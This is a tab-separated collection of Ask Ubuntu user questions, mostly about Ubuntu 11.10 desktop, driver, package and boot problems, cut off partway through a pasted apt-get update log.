65996	why are there two icons in the unity launcher for nautilus ?	okay , so i installed ubuntu 11.10 . the thing is , when i click the home folder icon in the launcher ( win + 1 ) , the home folder opens and a new icon appears in the launcher . i want the windows to be highlighted in the first icon only if you catch my drift ( 4th icon ) . i thought if i could remove the first icon and then right-click on the other icon and keep it in the launcher , it may work - but then folders open and the icon remains blank without any indication that a window is open ( looks same as first icon ) . also , the icons numbered from top to bottom exclude the dash icon .
66000	how to merge partitions ?	i have two partitions one of them is file system and other is unallocated how to merge two partitions ?
66001	are ubuntu and gnome drifting apart because of unity ?	after upgrading my laptop to 11.10 from 11.04 , gnome was removed entirely , and the interface was unity when i first logged in . unity underwhelms me entirely . i 'm not saying it 's bad , i 'm sure some people like it . i just do n't care enough about it 's features to learn how to use it when i 'm already so familiar with gnome . i installed gnome , and i was given three session options at the log in screen . gnome , gnome classic , and gnome classic ( no effects ) . gnome ( without qualifications ) simply does not work . i log in , and i have no menu bars , just a desktop . right clicking on the screen does nothing . all i can do is press ctrl+alt+del and get out again . gnome classic and gnome classic ( no effects ) both work , but the appearance is a little messed up . the icons on the top panel have odd sizes and the colours of the panel and the icons do n't quite match . it 's not a huge problem , but the whole experience is making me feel like ubuntu is going entirely into unity , and gnome , if supported , will always be faltering for lack of official support . are the problems i 'm seeing with gnome symptomatic of ubuntu 's break from gnome , or can i expect to solve this issues and work with gnome/ubuntu as i always have ?
66003	how can i access the systray whitelist ?	i already tried : gsettings get com.canonical.unity.panel systray-whitelist and it did n't work .
66014	world of goo is not in ubuntu software centre ?	i bought world of goo about 1 year ago and i wanted to install it again on oneiric ocelot but it seems that it 's not available anymore . so , can someone confirm this ? if it 's not there , should n't i be able to install something i paid for ? thank you
66016	ubuntu one - synch or backup	either i am not getting something or a lot of folks are not understanding the difference between sync and backup . this can be quite dangerous . my understanding of synching is that you are basically mirroring . lets say you sync a folder on your hard drive with a folder on the web . this means that if you add files to your folder on the hard drive that it will be added to the folder on the web . this is great . the danger here though is that if somehow files are lost from the folder on the local drive then they are removed from the folder on the web . remember this is synching not backing up . a backup on the other hand , of the same situation , means that if a file is deleted from your local drive it would still be available in the web folder . ubuntu one seems to only offer synching not backing up . using third part utilities such as deja dup backup tool . besides this backup tool does anyone know if you can ftp or another utility to upload/backup to ubuntu one ? if so what are the settings ( url/uri/address ) for ubuntu one ?
66017	precautions to take when installing ubuntu on a laptop and moving the hdd to a headless server ?	i have no monitor and i 'm planning to do this : install ubuntu server on laptop . move hdd to headless server ( hoping it will work ) . is there anything i should worry about ? i imagine that i need to check /etc/fstab to make sure that the right hdd is mounted on startup because on the laptop it might have a different name than on the server .
66018	software centre `` failed to download package '' ?	i installed ubuntu 11.10 and started with the software center . at first no software had the install option so i chose `` use the source '' . but the download ( whatever it was downloading ... ) was taking too long so i canceled them . when i next moved onto the `` get software '' page , the install buttons had somehow appeared in any softwares i searched for , but none of them installed on my system when i tried to do so . i keep getting this `` failed to download package . check connection '' error even when i am parally working on firefox .
66020	avahi slow to start - can ping ip , but hostname comes online after few mintues	i 've a strange problem . on ubuntu server 11 . i 've avahi running . when i restart machine , in about 1 min server is up , i can connect through ssh or ping it via ip . but not via hostname server.local - it takes about 3-4 minutes for server.local to become accessible . that 's allot ! i installed avahi to handle hostname . i believe there is something wrong with startup procedure and it gets delayed or smth . how should i diagnose the problem ? or is there way to configure avahi to be more responsive ? p.s . i also noticed few times , hostname was accessible but not ip . which makes me believe there is something really wrong going on . thanks !
66021	how to disable a laptop 's built-in wifi nic when using a pcmcia one ?	i have a weak ( having to reconnect frequently ) `` intel ultimate n wifi link 5300 '' built-in wifi module in my dell e5500 laptop and prefer to use a pcmcia `` atheros ar5008 '' instead . on windows i just switch the laptop 's wireless switch to off and the built-in module gets disabled ( while atheros ( d-link , actually ) drivers just ignore it ) . but xubuntu 11.10 understands the wireless switch and disables all the wifi modules , including the pcmcia one . how to disable the built-in one without disabling the pcmcia one in this case ? i do n't want to have both of them ( as i do now ) . would be cool if i could switch them on and off easily and in an instant , as i can do in windows .
66022	deluge does n't start up on boot - how do i diagnose this problem ?	i installed deluge and configured it to startup webgui using this tutorial : http : //www.havetheknowhow.com/install-the-software/install-deluge-headless.html but it does n't work ! it just worked on first reboot , after that i need to start it manually everytime . i believe there is something wrong with startup script . but i have no idea how to diagnose this problem , where should i see logs of what is going wrong ? or in general how to deal with this kind of problem . thanks !
66023	audio and video are out of sync	i just upgraded to oneiric ocelot and a problem that was already present in natty has become worse - namely , the audio and video are not in sync both in vlc and in mplayer . the problem only used to happen in vlc in natty . some searching on the internet seems to indicate that pulse-audio might be the problem .
66026	failed to fetch during update . something is going wrong with ppa	i am using ubuntu 11.10 since yesterday and i can not install anything from a ppa . is this a 11.10 problem ? w : failed to fetch http : //ppa.launchpad.net/bisigi/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/bisigi/ppa/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found how could i change the oneiric to natty in sources list ?
66029	software center keeps asking for a cd/dvd when installing applications	i just got linux ubuntu , but i have a problem . i am trying to download wine and flash but i keep on getting this : cd/dvd 'ubuntu 11.10 oneiric ocelot - release amd64 ( 20111012 ) ' is required could someone please help me out ? thanks in advance !
66030	g++ and boost linker error after upgrade	i am getting the following problems . i am sure it is a package that was not install/upgraded properly , i am not sure which one : $ make g++ -i/usr/include/boost -mm ./yyy.cc ./main.cc ./myclass.cc > buildfiles.d g++ -wno-deprecated -wall -ansi -o2 -i/usr/include/boost -c -o yyy.o yyy.cc g++ -wno-deprecated -wall -ansi -o2 -i/usr/include/boost -c -o main.o main.cc g++ -wno-deprecated -wall -ansi -o2 -i/usr/include/boost -c -o myclass.o myclass.cc g++ -o prog -wno-deprecated -wall -ansi -o2 -i/usr/include/boost -l/usr/lib -lstdc++ -lboost_program_options -lboost_thread ./yyy.o ./main.o ./myclass.o ./yyy.o : in function `void boost : :call_once < void ( * ) ( ) > ( boost : :once_flag & , void ( * ) ( ) ) ' : yyy.cc : ( .text._zn5boost9call_onceipfvveeevrns_9once_flaget_ [ void boost : :call_once < void ( * ) ( ) > ( boost : :once_flag & , void ( * ) ( ) ) ] +0x14 ) : undefined reference to `boost : :detail : :get_once_per_thread_epoch ( ) ' yyy.cc : ( .text._zn5boost9call_onceipfvveeevrns_9once_flaget_ [ void boost : :call_once < void ( * ) ( ) > ( boost : :once_flag & , void ( * ) ( ) ) ] +0x2c ) : undefined reference to `boost : :detail : :once_epoch_mutex' yyy.cc : ( .text._zn5boost9call_onceipfvveeevrns_9once_flaget_ [ void boost : :call_once < void ( * ) ( ) > ( boost : :once_flag & , void ( * ) ( ) ) ] +0x62 ) : undefined reference to `boost : :detail : :once_epoch_mutex' yyy.cc : ( .text._zn5boost9call_onceipfvveeevrns_9once_flaget_ [ void boost : :call_once < void ( * ) ( ) > ( boost : :once_flag & , void ( * ) ( ) ) ] +0x67 ) : undefined reference to `boost : :detail : :once_epoch_cv' yyy.cc : ( .text._zn5boost9call_onceipfvveeevrns_9once_flaget_ [ void boost : :call_once < void ( * ) ( ) > ( boost : :once_flag & , void ( * ) ( ) ) ] +0x95 ) : undefined reference to `boost : :detail : :once_epoch_mutex' [ ... ] just top be clear , the headers are installed and included in the .h files .
66033	unity panel menus only work on one monitor of dual monitor setup	i have just installed 11.10 on my dual monitor system , i have a problem with the panel menus ( settings/power , memenu , calendar etc. ) . what is happening is on one monitor , everything functions fine , but on the other , the menus do not stay open when i click on them . the will appear briefly , but then close straight away . if i click and hold they stay open , but only until i let go . like i said , this only happens on one monitor at a time , but the monitor on which it happens seems to change . edit : ok it seems there is a bug filed for this here : bug report ( thanks adrian ) . still no fix out yet .
66040	apt-get gets `` duplicate source entries '' and two architectures	since i upgraded to oneiric apt-get seems to ignore my architecture and gets the sources for both , amd64 and i386 , files from the repositoreis . this leads to constant `` duplicate source entries '' errors . what to do ? **edit : information provided by dizzy here is the requested file ( since i 'm not allowed to post more than two urls i 've modified the urls not to be recognized ( to std url / http : // to .. ) : deb *std url* oneiric main restricted deb *std url* oneiric-updates main restricted deb *std url* oneiric universe deb *std url* oneiric-updates universe deb *std url* oneiric multiverse deb *std url* oneiric-updates multiverse deb ..archive.canonical.com/ubuntu oneiric partner deb *std url* oneiric-security main restricted deb *std url* oneiric-security universe deb *std url* oneiric-security multiverse deb ..download.virtualbox.org/virtualbox/debian oneiric contrib # disabled on upgrade to oneiric deb ..extras.ubuntu.com/ubuntu oneiric main # third party developers repository
66045	strange ui after upgrading to 11.10	i just upgraded to 11.10 ( from 11.04 ) . i was using the 'classic ubuntu ' login as default before . when i now log in , i do n't get the top bar ( where you have applications , places , system normally ) . instead i get like a menu with file , edit , view , go , bookmarks and help . i also do not get the launcher thing on the left side ( i am now using 'ubuntu ' to log in ) . any idea what might be wrong ? any commands i can run to help debug this ? regards , wim edit : this is a screenshot of what i see .
66047	how do i change a ppa from 11.10 to 11.04 ?	how do i change oneiric to natty in sources list ? i want to know this cause oneiric has a problem with the ppa .
66053	how do i replace and update intel i910 chipset driver in ubuntu-9.04	i have a question about vga driver issue , i am now have ubuntu-9.04 with linux-kernel-2.6.28 install in my machine . my machine has intel i910 chipset . and i found that when i use the external monitor , i ca n't work with extension mode at my second display . then i also try ubuntu-10.04 at the same machine which has i910 chipset . it works well when i use external monitor . i can use mirror mode and extension mode at second display . the big problem for me is , i have a application that works only for ubuntu-9.04 with kernel-2.6.28 . so i ca n't change the ubuntu version to 10.04 . can i just change the intel vga driver in 9.04 ? how to do it ? is it possible to use the intel vga driver which build-in 10.04 in 9.04 ? thanks for your kindly help !
66058	how to shut down x ?	what if i 'd like to exit the x session to use raw console without any x process running ? i know i can always press ctrl+alt+f1/f6 to switch between a raw console and a graphical environment , but some times i just want the last to be gone ( for technical reasons ) . so how to shut it down correctly , preventing from being automatically respawned ?
66060	how to make changes in xdg-user-dirs.dirs have effect in files lens ?	i 've changed some favourite folder locations in ~/.config/xdg-user-dirs.dirs , since i prefer different locations for music and pictures folder , and nautilus recognized the changes . however the unity files lens do n't . if i try to open e.g . music folder from files lens , unity tries to open the old folder location . how to make changes in ~/.config/xdg-user-dirs.dirs have effect in files lens ? thanks
66066	`` wifi hardware switched off '' on an hpg61 ( atheros 9285 )	yesterday i upgraded my ubuntu natty to oneiric on my notebook hp g61 ( wifi card atheros ar9285 ) . when i start on normal mode wifi dont work : menu under tray-icon says ; `` wifi hardware switched off '' . if i put the command `` rfkill list '' i get this answer : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes then i launch `` sudo rfkill unblock all '' but the output of `` rfkill list '' dont change . so when i start on recovery mode wifi work normally . this is the output of `` rfkill list '' : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no any suggestion ?
66069	how to prevent launcher from influencing window placement ?	as i understand it , in ubuntu 11.04 setting the autohide setting on compiz config - unity ( see here ) not only hid the launcher but prevented the launcher from influencing window placement . however , since updating to ubuntu 11.10 when i open a new window it gets indented the space of the launcher . i just want new windows to open flush left . this is annoying , because i like to have two windows on my large screen , one taking up the left half of the screen and the other taking up the right half of the screen . indenting causes them to overlap . how can i stop ubuntu 11.10 thinking that the launcher takes up desktop space when placing windows ? the following screen shot shows what i 'm talking about . i 've just opened chromium and the window is indented by the width of the launcher .
66070	how to set windows bootloader as default bootloader ?	i have a win 7/11.10 dual boot system with grub 2 as the default bootloader . however , i want to make windows bootloader the default bootloader ( grub 'dos ' like interface scrares the hell out of my sister ) so when i start the pc i will have the following boot options : 1 . windows 7 2 . ubuntu nb : a process to reverse this operation so grub can be the default bootloader again will also be appreciated
66074	installed on a machine with efi and after installation , it says the disk is not bootable	i installed ubuntu 11.10 and the installation runs through fine . it then says reboot , and the machine says 'inserts a boot disk ' which means the hard disk is n't bootable . the primary hard disk is an efi device , and nothing seems to work . the machine in question is an acer aspire m3970 desktop . core i5 2300 , with 8gb ram . main boot drive is an ssd ( vertex 2e 60gb ) . i am trying to install the 11.10 x64 version . the installation i have tried from cd and usb stick . it goes through the install , allows you to partition the drives then installs all the packages . at the end it goes for a reboot , and asks you to remove the installation media . the pc then restarts and says no bootable disk . i tried it many times . in the end i have installed fedora 15 x64 which works straight away with no messing . unless this issues is fixed i have to drop 11.10 as a viable option . from my experience f15 is n't quite as polished as ubuntu , but in this case - it works ! ! is this a widespread problem or am i unique ?
66075	how can i change my screensaver in ubuntu 11.10 ?	i 'm a new user of ubuntu oneric . where can i set the configuration of my screensaver ? i need to use xscreensaver ? what is the function of gnome-screensaver ?
66077	gnome-panel messed up after installing ati driver	after installing the proprietary ati driver , the gnome-panel in the gnome3 shell is completely messed up . uninstalling the driver does n't work , any ideas ?
66078	can i disable my touchpad during installation ?	my touch pad is not working correct in ubuntu since having an accident with a coffee spill . it freezes my mouse . so i had to disable it in ubuntu , in order to be able to work , but i want to install the latest version but ca n't get through the process of installation because it freezes my mouse . can i disable touch pad during an installation ? ps : i would like to do it without disassembling my laptop and disconnecting touch pad from motherboard . i also did n't find an option in bios to disable touch pad .
66079	compiz crash means launcher and almost everything else has disappeared from desktop	i installed 11.10 this morning , and all seemed fine - slightly transparent windows and all . i installed it 'over the top ' of 11.04 - that is , not through the update dialogue , and it worked fine . i decided to make my launcher icons smaller , so opened ccsm , and clicked the second choice down in the left hand pane ( did n't alter any settings ) and it crashed completely . i had to hold the power button , and when i restarted it , all i have visible anywhere is a file edit view menu across the top , and my spotify icon on the desktop . nothing to log in , log out , nothing visible anywhere , no application menu , no launcher , nothing . i 'm at a loss as to what to try . i can open a terminal , but i have tried ( perhaps incorrectly ) to close and restart both nautilus and unity , and neither did anything ( assuming i was doing it right ) any thoughts , or shall i reinstall ?
66080	okular stuck on `` reloading a pdf document ''	after upgrading from ubuntu 11.04 to 11.10 and okular seems to be not working properly . when i open a pdf document , it says 'reloading the document ... ' again and again and an hour glass is shown . the problem is intermittent and happened with the following pdf . has anyone had similar experience ?
66081	touchpad gets disabled after sometime after login	i upgraded from natty to oneiric and use a external logitech mouse . when i login with both the touchpad and mouse enabled , the touchpad works fine . but if i continue using the mouse for sometime , and then try to use the touchpad it does not work . it is as if it is disabled for power saving . i do not use any touchpad-indicator or tweak any settings . this did not happen when i was running natty . how can i solve this ? do i submit a bug report ?
66086	what is this install icon on the launcher on my installed system ?	i 'm using the 11.10 version since the rc which i used to update every time an update is issued . the final release is now out and i still see the `` install release '' icon on the dock . if i install all the updates the normal way ( through the update manager ) what would be my system status : the final release or just an updated rc ? do i have to re-launch the installer from that icon to get the release ( knowing that i 'll have to re-do every step the installer requires ) ? here is an amateur made screenshot of the icon i 'm talking about : if i 'm missing something please guide me . thanks .
66087	how to set up a second display to be 1280x1024 if arandr only suggests 1024x768 as a maximum ?	after creating a xorg.conf i 've got able ( there was a nasty bug in confless mode : always overlaying the second display over the first instead of using the second physical screen ) to set up a second display ( a dsub-attached classic 17-inch panel ) with arandr ( under xubuntu 11.10 ) on intel gma x4500mhd ( a dell e5500 laptop ) . but the maximum resolution appearing in it 's menu ( for this particular display ) is 1024x768 while its native resolution is 1280x1024 . how to fix this ? i use to switch between different external monitors ( with different characteristics ) and working without any some times , so i 'd like to avoid any hardcoding . but , if it is hardly possible to make the thing detect supported resolutions correctly , i 'd be glad to know how to add them manually ( the way meant to work if the monitor is physically capable of a resolution specified , though not advertising it correctly ) .
66094	how can i configure ms exchange 2007 in thunderbird ?	i 've just upgraded to ubuntu 11.10 which has thunderbird as default mail client . in evolution i can configure it for using it with ms exchange 2007 , is that possible with thunderbird too ?
66096	how to set up xfce4 xkb plugin to remember settings over reboots ?	following this answer i 've installed xfce - xfce4-xkb-plugin to indicate and switch keyboard layouts in xubuntu . but it resets all the settings ( languages i use and a switch layouts hotkey ) every time i reboot . how to make it to remember ?
66097	how do i open a new window in the same monitor ?	i have 2 monitors and using oneiric ocelot ubuntu . if i have opened firefox on my first monitor and want open new window , new window is always opened on the second monitor . how i can set using 1 monitor in the application ? thanks .
66099	how can i update pgadmin3 to v1.14 ?	i installed ubuntu 11.10 yesterday . from the repos i installed postgresql and pgadmin3 . postgresql 9.1 is the current version but it seems pgadmin3 v1.12 is not properly compatible with 9.1 . how can i update it to use pgadmin3 v1.14 ? i have tried to add this ppa https : //launchpad.net/~rhonda/+archive/pgadmin3 but after i reload my sources i just get an error . thanks
66101	world of warcraft stuck at connecting	i just got linux and transfered my wow folder from the windows part of my hdd to the new linux one . i have a problem while trying to play : -i manage to start up the game ( using wine ) but it stops at `` connecting '' . could anyone help ? thanks !
66108	shutdown stuck at ubuntu logo	i 've installed my ubuntu11.10 yesterday . i updated it and now when i go to shutdown it stucks at ubuntu logo ( the one with the white small balls ) . i waited 20 mins and nothing , i always have to shutdown by holding the power button . any suggestions ? thanks : )
66109	libgl.so and gl.h not available from standard path	i 've just done a fresh install of 11.10 , + nvidia-current from xswat ppa ( cause the current version shipped with ubuntu is broken for my gpu ) . please take time for understanding each steps . i do n't know where to report this issue . installation of nvidia-current [ -dev ] after installing nvidia-current and nvidia-current-dev , theses files are missing : /usr/lib/libgl.so /usr/include/gl/gl.h both are installed into : /usr/lib/nvidia-current/libgl.so /usr/include/nvidia-current/gl/gl.h by default , theses are not accessible though standard path , and broke compilation to many software . ( no gl.h found , then no -lgl found . ) broken in design solution to fix that , we need to install libgl1-dev . libgl1-dev install mesa gl.h in /usr/include/gl/gl.h and install mesa libgl.so in /usr/lib/libgl.so with libgl1-dev , i 'm able to compile gl related software . but after compilation , i can see that nvidia libgl is used : $ ldd mysoftware libgl.so.1 = > /usr/lib/nvidia-current/libgl.so.1 ( 0x00007f620d78c000 ) conclusion we need libgl1-mesa-dev to be able to compile gl-related software by default we do n't use nvidia header at compilation , but mesa header we do n't use any mesa lib at runtime questions why should i install mesa development since i already got everything on my computer ? should ubuntu need to install or symlink nvidia libs and header in standard location if mesa are not installed ?
66110	not possible to install on an asus a8n - sli premium	ive got a big big problem , and now im already tired of waiting for the next distribution . since 10.04 was released , im not able to install it on my computer in the normal way ! everytime i boot from cd , it keeps hangin or even dont boots ! ive tried every version since that , and hoped for a proper release to suit on my old pcs . i nearly had success , when i took the alternate - distribution , cause then booting was not the problem , but the reboot to the system fails - every time . the only way to get ubuntu 10.04 running on my pc is to install 9.10 - cause this works very proper and fast - and upgrade then to 10.04 ... but newer once never runs ! i already tried to boot from usb , external cd-drive , and a old ide drive ! heres the architecture of my pc # 1 : mainboard : asus a8n sli premium , socket 939 processor : amd opteron ... srry dont know the number by now : p ram : 4 x twinmos ( each 512mb ) graphicscard : 2 x asus 6800 gt raid-controller : adaptec 2400a ( running raid-level 5 ) harddrives : ide ( 4 x 160 gb , western digital blue ) soundcard : creative audigy 2 se opticaldrives : 2 x samsung s-ata ( burner ... ) supplied by : enermax liberty 500w @ this config i already tried it with 2 x seagate barracuda drives , with onboard silicon-image , and nvidia raid , both running raid-levels 0 ) heres the architecture of my pc # 2 : mainboard : asus m2n sli deluxe , socket am2 processor : amd athlon 4200+ ram : 2 x corsair ( each 2048mb ) graphicscard : 1 x asus ... . gt raid-controller : using silicon image raid from board ( running raid-level 0 ) harddrives : s-ata ( 2 x 500gb , western digital green ) soundcard : creative audigy opticaldrives : 1 x samsung s-ata ( burner ... ) supplied by : enermax 600w maybe , the new hardware layers dont like my boards , or the new grub bootloader doesnt do ... cause when booting is done , the raid controller dont seems to be the problem , but as i already mentioned restart keeps hangin , after succeeded installation : - ( i hope that someone can help me , cause i would really , really like to run the newer distributions on my systems .
66111	upgrade from 11.04 to 11.10 crashed	i am new to ubuntu and linux as a whole . i had kept my system on upgrade 11.04 to 11.10 and suddenly the terminal box showed up with some commands and was stuck there . i tried to reboot but again the terminal shows with set of boot sequences and gets stuck .
66117	where to put custom .bashrc stuff , in .bash_local ?	just upgraded to 11.10 , and prompted me to wondering where is now the preferred way to put customised .bashrc bits ? i have some aliases , some env variables , and a python virtualenvwrapper script , for instance , which i want to run as part of my .bashrc . i have these synced in a script across machines stored in dropbox . i used to put them at the bottom of .bashrc , and then i put them in a file called .bash_profile which it sourced , but now i see that .bashrc no longer sources .bashrc_local ( did it ever or did i customise this ? ) , and i note that it sources .bash_aliases and .bash_completion . so i 've decided as it 's non existent at the mo to put the stuff in .bash_aliases , as it seems cleanest to have my customisations in a separate file to the default . i got scared off .profile as it already has stuff in it . i realise what i 'm doing works , but it seems a bit counter intuitive to be putting these things in a file called aliases when it 's not all aliases . is this the correct place for this ?
66119	syntax error while installing coldfusion 9	while installing coldfusion 9 server on ubuntu machine i got error ... . please help sudo ./coldfusion_9_wwe_linux64.bin preparing to install ... extracting the jre from the installer archive ... unpacking the jre ... extracting the installation resources from the installer archive ... configuring the installer for this system 's environment ... launching installer ... /tmp/install.dir.2481/linux/resource/jre/bin/java : 1 : syntax error : `` ( `` unexpected i tried running sudo bash ./coldfusion_9_wwe_linux64.bin it but i got launching installer ... ./coldfusion_9_wwe_linux.bin : line 2468 : /tmp/install.dir.3633/linux/resource/jre/bin/java : can not execute binary file ./coldfusion_9_wwe_linux.bin : line 2468 : /tmp/install.dir.3633/linux/resource/jre/bin/java : success â
66124	module nvidia_173 not found	i just did a fresh ubuntu 11.10 install on my laptop , but i can not manage to start the graphic mode . when the laptop boots it gets stuck after the loading screen . i tried to ctrl-alt-f1 , log in and start manually the x server , but i get this error : fatal : module nvidia_173 not found . ( ee ) nvidia ( 0 ) : failed to load the nividia kernel module ! the module is installed of course , and i tried also to reinstall nvidia-current . i already tried following same thread on this issue , but nothing seems to work for me . anyone knows a valid solution ? thanks .
66125	how to change the shortcut to move windows from alt to super/meta ?	i use graphics software like gimp , inkscape & blender extensively for my business . but most of them require the use of the alt key in some way or the other . come ubuntu 11.10 , i have n't been able to find any way to change the shortcut for window moving/resizing from alt+lmb/mmb to super/meta+llm/mmb . this option was present in the 'windows ' settings in gnome2 , but it is not present anywhere in gnome3 . and yes , i have tried searching through the shortcuts tab in keyboard settings , its not there . any help regarding this would be useful . thanks .
66126	blurry fonts in xfce	since my system was laggy in gnome 3 i switched to xfce , but now all the titlebar and menu fonts are blurry but the fonts in chromium seem normal . the nvidia config tell that my refresh rate is 75hz this is the maximum supported by my crt display.however the xfce config says its 50hz specs : ubuntu 11.10 nvidia zotac 6200 intel pentium 4 2.93ghz 2gb ddr1 memory
66128	is it possible to configure lightdm to load caribou for the on screen keyboard , replacing onboard ?	when using gnome shell it comes with caribou , an on screen keyboard that looks really nice ( on par with screen keyboards found on ios and android ) . i see that lightdm is configured to use onboard as the default on screen keyboard for those with touch screen devices . is it possible to substitute onboard with caribou through configuration ?
66129	18 gb free space suddenly disappeared ?	i was installing ubuntu alongside with win 7 , and i devoted a full partition for linux during installation . the problem is it didnt install correctly and the 18 gb space cant be found when logging in to win 7 . please help .
66130	how do i run gshutdown as root ?	how do i run gshutdown as root . in 11.04 , i modified the comand line via the main menu , by adding , su-to-root -x -c /usr/bin before the command line . i ca n't find an equivalent to 'main menu ' in oneric .
66134	remove mail menu from indicator-messages	i 'm using popper mail notification , which integrates into the messaging applet , therefore i have no use for the default message indicator entries . is there a way to hide/remove them ? i already disabled the thunderbird unity integration add-on .
66137	what is `` ubuntu desktop usb '' in tasksel ?	what is ubuntu desktop usb tasksel alternative in ubuntu server 11.10 edition ?
66141	why is n't the bisigi ppa working in 11.10 ?	failed to fetch http : //ppa.launchpad.net/bisigi/ppa/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/bisigi/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found can anyone tell me why this is happening and how i could fix this ?
66143	what is the best storage configuration for libvirt and kvm ?	i have a kvm-host with a lot of local disk for virtual machines that i administer using virtmanager . i want an easy solution for addressing disk for my virtual hosts . i also want to be able to add storage to the virtualmachines from time to time . lvm are nice and have a lot of features for increasing partition size and for snapshots . but since kvm makes its own partition table on lvm-partitions its not so easy to change size for both the partition and the underlying filesystem . virtmanager are not able to use all lvm-features so if i should continue with lvm i have to use other administrations tools to . any thoughts ?
66146	why 11.10 says plymouth errors and `` checking battery state ... '' ?	i 've just installed new ubuntu 11.10 . the installation was successful . but when i start the ubuntu , the splash screen does not work , and i get error ( always some of these ) `` mountall : plymouth command failed '' , `` mountall : connect to plymouth was lost '' or `` checking battery state ... '' i 'm sorry , if the error messages are incorrect because i translated two first of them from finnish ( my system is in finnish ) to english , so they maybe could n't be just right . i have already asked from our finnish community , but they could n't answer . could anybody here ?
66150	unable to open ubuntu software center , can not repair package catalog	i just upgraded to 11.10 , but during the installation something happened towards the end with the adobe flash package and the installation just ended . it said it would try to recover , but did n't , and now i 'm booting fine into 11.10 . however , when i try to open ubuntu software center , i get this dialog box : when i click repair , it asks for the root password , then pops this up again . it will continue to pop up until i close the software center . i 've tried to update/upgrade my repository , i 've tried to sudo apt-get install -f , i 've tried removing the adobe flash plugin , but nothing seems to be helping . [ edit ] requested output ( sudo apt-get update & & sudo apt-get upgrade ) : ign http : //dl.google.com stable inrelease ign http : //dl.google.com stable inrelease get:1 http : //dl.google.com stable release.gpg [ 198 b ] get:2 http : //dl.google.com stable release.gpg [ 198 b ] ign http : //ppa.launchpad.net oneiric inrelease ign http : //ppa.launchpad.net oneiric inrelease ign http : //security.ubuntu.com oneiric-security inrelease ign http : //archive.canonical.com oneiric inrelease get:3 http : //dl.google.com stable release [ 1,347 b ] ign http : //extras.ubuntu.com oneiric inrelease get:4 http : //dl.google.com stable release [ 1,347 b ] hit http : //ppa.launchpad.net oneiric release.gpg hit http : //security.ubuntu.com oneiric-security release.gpg hit http : //archive.canonical.com oneiric release.gpg hit http : //extras.ubuntu.com oneiric release.gpg get:5 http : //dl.google.com stable/main amd64 packages [ 1,207 b ] hit http : //ppa.launchpad.net oneiric release.gpg get:6 http : //dl.google.com stable/main i386 packages [ 1,199 b ] hit http : //security.ubuntu.com oneiric-security release hit http : //archive.canonical.com oneiric release hit http : //extras.ubuntu.com oneiric release ign http : //dl.google.com stable/main translationindex get:7 http : //dl.google.com stable/main amd64 packages [ 764 b ] hit http : //ppa.launchpad.net oneiric release get:8 http : //dl.google.com stable/main i386 packages [ 779 b ] hit http : //security.ubuntu.com oneiric-security/main sources ign http : //dl.google.com stable/main translationindex hit http : //archive.canonical.com oneiric/partner amd64 packages hit http : //extras.ubuntu.com oneiric/main sources hit http : //ppa.launchpad.net oneiric release hit http : //security.ubuntu.com oneiric-security/restricted sources hit http : //security.ubuntu.com oneiric-security/universe sources hit http : //security.ubuntu.com oneiric-security/multiverse sources hit http : //security.ubuntu.com oneiric-security/main amd64 packages hit http : //security.ubuntu.com oneiric-security/restricted amd64 packages hit http : //archive.canonical.com oneiric/partner i386 packages ign http : //archive.canonical.com oneiric/partner translationindex hit http : //extras.ubuntu.com oneiric/main amd64 packages hit http : //extras.ubuntu.com oneiric/main i386 packages hit http : //ppa.launchpad.net oneiric/main sources hit http : //ppa.launchpad.net oneiric/main amd64 packages hit http : //ppa.launchpad.net oneiric/main i386 packages ign http : //ppa.launchpad.net oneiric/main translationindex hit http : //security.ubuntu.com oneiric-security/universe amd64 packages hit http : //security.ubuntu.com oneiric-security/multiverse amd64 packages hit http : //security.ubuntu.com oneiric-security/main i386 packages hit http : //security.ubuntu.com oneiric-security/restricted i386 packages hit http : //security.ubuntu.com oneiric-security/universe i386 packages hit http : //security.ubuntu.com oneiric-security/multiverse i386 packages ign http : //security.ubuntu.com oneiric-security/main translationindex ign http : //us.archive.ubuntu.com oneiric inrelease ign http : //us.archive.ubuntu.com oneiric-updates inrelease ign http : //extras.ubuntu.com oneiric/main translationindex hit http : //ppa.launchpad.net oneiric/main sources hit http : //ppa.launchpad.net oneiric/main amd64 packages hit http : //ppa.launchpad.net oneiric/main i386 packages ign http : //ppa.launchpad.net oneiric/main translationindex ign http : //security.ubuntu.com oneiric-security/multiverse translationindex ign http : //security.ubuntu.com oneiric-security/restricted translationindex ign http : //security.ubuntu.com oneiric-security/universe translationindex hit http : //us.archive.ubuntu.com oneiric release.gpg ign http : //dl.google.com stable/main translation-en_us hit http : //us.archive.ubuntu.com oneiric-updates release.gpg ign http : //dl.google.com stable/main translation-en ign http : //archive.canonical.com oneiric/partner translation-en_us ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //archive.canonical.com oneiric/partner translation-en ign http : //security.ubuntu.com oneiric-security/main translation-en_us ign http : //security.ubuntu.com oneiric-security/main translation-en ign http : //extras.ubuntu.com oneiric/main translation-en_us ign http : //security.ubuntu.com oneiric-security/multiverse translation-en_us ign http : //security.ubuntu.com oneiric-security/multiverse translation-en ign http : //security.ubuntu.com oneiric-security/restricted translation-en_us ign http : //security.ubuntu.com oneiric-security/restricted translation-en ign http : //security.ubuntu.com oneiric-security/universe translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //extras.ubuntu.com oneiric/main translation-en hit http : //us.archive.ubuntu.com oneiric release ign http : //security.ubuntu.com oneiric-security/universe translation-en ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en hit http : //us.archive.ubuntu.com oneiric-updates release hit http : //us.archive.ubuntu.com oneiric/main sources hit http : //us.archive.ubuntu.com oneiric/restricted sources hit http : //us.archive.ubuntu.com oneiric/universe sources hit http : //us.archive.ubuntu.com oneiric/multiverse sources hit http : //us.archive.ubuntu.com oneiric/main amd64 packages hit http : //us.archive.ubuntu.com oneiric/restricted amd64 packages hit http : //us.archive.ubuntu.com oneiric/universe amd64 packages hit http : //us.archive.ubuntu.com oneiric/multiverse amd64 packages hit http : //us.archive.ubuntu.com oneiric/main i386 packages hit http : 